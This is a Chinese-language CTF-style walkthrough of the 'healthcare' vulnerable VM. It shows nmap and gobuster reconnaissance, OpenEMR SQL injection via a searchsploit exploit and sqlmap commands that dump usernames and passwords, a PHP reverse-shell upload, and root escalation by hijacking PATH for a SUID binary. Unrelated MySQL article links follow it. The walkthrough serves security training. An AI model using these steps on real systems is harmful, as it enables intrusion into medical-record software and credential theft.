healthcare靶机(openEMR管理系统SQL注入漏洞)

2023-11-03 07:50

本文主要是介绍healthcare靶机(openEMR管理系统SQL注入漏洞),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

环境准备

靶机链接:百度网盘 请输入提取码b

提取码:822u

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机arp-scan -l

nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务

2.用gobuster扫描目录

gobuster dir -u http://192.168.1.102 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 50

3.访问网页

漏洞利用

1.查看敏感目录/robots.txt;没有一点用。

2.访问openemr目录是一个登录界面,并且是cms有版本号

http://192.168.1.102/openemr/interface/login/login_frame.php

3.数据库中查找cms漏洞,找到俩个,而且都是SQL注入漏洞

searchsploit openemr

方法一:

1.查看下17998.txt 没啥利用的

2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行

searchsploit -m 49742.py //保存到本地

3.用python3来执行

4.MD5解码admin ackbar

方法二

sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= --dbs
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr --tables
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr -T users --columns
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump

1.我这边python提示环境下没有这个目录,用软连接

/usr/bin/env: “python”: 没有那个文件或目录

sudo ln -s /usr/bin/python3 /usr/bin/python

2.查询表名 -D指定数据库名称

u= -D openemr --tables

3.u= -D openemr -T users --columns

4.u= -D openemr -T users -C username,password --dump

5.用爆出的密码登录

6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来

7.开启监听,访问目录,触发木马,成功反弹shell

权限提升

1.用find命令查询到healthcheck,有suid权限

python -c "import pty;pty.spawn('/bin/bash')" //反弹交互式shell

find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件

2.运行后,他的命令,有ifconfig的组成;

3.自己创建一个ifconfig里面写入提权脚本,让ifconfig,优先执行我的ifconfig,只需改变环境变量即可!

export PATH=/tmp:$PATH

4.再次执行healthcheck,就成功提权到root!!!

这篇关于healthcare靶机(openEMR管理系统SQL注入漏洞)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/336679

相关文章

MySQL查询JSON数组字段包含特定字符串的方法

《MySQL查询JSON数组字段包含特定字符串的方法》在MySQL数据库中,当某个字段存储的是JSON数组,需要查询数组中包含特定字符串的记录时传统的LIKE语句无法直接使用,下面小编就为大家介绍两种... 目录问题背景解决方案对比1. 精确匹配方案(推荐)2. 模糊匹配方案参数化查询示例使用场景建议性能优

mysql表操作与查询功能详解

《mysql表操作与查询功能详解》本文系统讲解MySQL表操作与查询,涵盖创建、修改、复制表语法,基本查询结构及WHERE、GROUPBY等子句,本文结合实例代码给大家介绍的非常详细,感兴趣的朋友跟随... 目录01.表的操作1.1表操作概览1.2创建表1.3修改表1.4复制表02.基本查询操作2.1 SE

MySQL中的锁机制详解之全局锁,表级锁,行级锁

《MySQL中的锁机制详解之全局锁,表级锁,行级锁》MySQL锁机制通过全局、表级、行级锁控制并发,保障数据一致性与隔离性,全局锁适用于全库备份,表级锁适合读多写少场景,行级锁(InnoDB)实现高并... 目录一、锁机制基础:从并发问题到锁分类1.1 并发访问的三大问题1.2 锁的核心作用1.3 锁粒度分

MySQL数据库中ENUM的用法是什么详解

《MySQL数据库中ENUM的用法是什么详解》ENUM是一个字符串对象,用于指定一组预定义的值,并可在创建表时使用,下面:本文主要介绍MySQL数据库中ENUM的用法是什么的相关资料,文中通过代码... 目录mysql 中 ENUM 的用法一、ENUM 的定义与语法二、ENUM 的特点三、ENUM 的用法1

MySQL count()聚合函数详解

《MySQLcount()聚合函数详解》MySQL中的COUNT()函数,它是SQL中最常用的聚合函数之一,用于计算表中符合特定条件的行数,本文给大家介绍MySQLcount()聚合函数,感兴趣的朋... 目录核心功能语法形式重要特性与行为如何选择使用哪种形式?总结深入剖析一下 mysql 中的 COUNT

mysql中的服务器架构详解

《mysql中的服务器架构详解》:本文主要介绍mysql中的服务器架构,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、mysql服务器架构解释3、总结1、背景简单理解一下mysqphpl的服务器架构。2、mysjsql服务器架构解释mysql的架

MySQL之InnoDB存储引擎中的索引用法及说明

《MySQL之InnoDB存储引擎中的索引用法及说明》:本文主要介绍MySQL之InnoDB存储引擎中的索引用法及说明,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐... 目录1、背景2、准备3、正篇【1】存储用户记录的数据页【2】存储目录项记录的数据页【3】聚簇索引【4】二

mysql中的数据目录用法及说明

《mysql中的数据目录用法及说明》:本文主要介绍mysql中的数据目录用法及说明,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、版本3、数据目录4、总结1、背景安装mysql之后,在安装目录下会有一个data目录,我们创建的数据库、创建的表、插入的

MySQL中的InnoDB单表访问过程

《MySQL中的InnoDB单表访问过程》:本文主要介绍MySQL中的InnoDB单表访问过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、环境3、访问类型【1】const【2】ref【3】ref_or_null【4】range【5】index【6】

MySQL 中 ROW_NUMBER() 函数最佳实践

《MySQL中ROW_NUMBER()函数最佳实践》MySQL中ROW_NUMBER()函数,作为窗口函数为每行分配唯一连续序号,区别于RANK()和DENSE_RANK(),特别适合分页、去重... 目录mysql 中 ROW_NUMBER() 函数详解一、基础语法二、核心特点三、典型应用场景1. 数据分